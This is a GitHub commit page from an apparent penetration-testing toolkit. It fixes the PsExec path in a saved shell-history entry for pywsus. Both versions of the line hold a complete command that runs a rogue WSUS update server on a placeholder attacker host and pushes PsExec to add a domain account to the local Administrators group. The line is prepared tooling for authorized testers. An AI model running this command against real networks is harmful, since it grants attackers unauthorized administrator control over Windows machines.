Skip to content

Commit

Permalink
Merge pull request #114 from Mathisca/fix-pywsus-history
Browse files Browse the repository at this point in the history
Fix pywsus history command
  • Loading branch information
ShutdownRepo authored Mar 2, 2023
2 parents c57a6aa + 6803c37 commit 6e4e909
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion sources/zsh/history.d/pywsus
Original file line number Diff line number Diff line change
@@ -1 +1 @@
pywsus.py --host "$ATTACKER_IP" --port 8530 --executable /opt/resources/windows/sysinternals/PsExec64.exe --command '/accepteula /s cmd.exe /c "net localgroup Administrators DOMAIN\controlleduser /add"'
pywsus.py --host "$ATTACKER_IP" --port 8530 --executable /opt/resources/windows/SysinternalsSuite/PsExec64.exe --command '/accepteula /s cmd.exe /c "net localgroup Administrators DOMAIN\controlleduser /add"'

0 comments on commit 6e4e909

Please sign in to comment.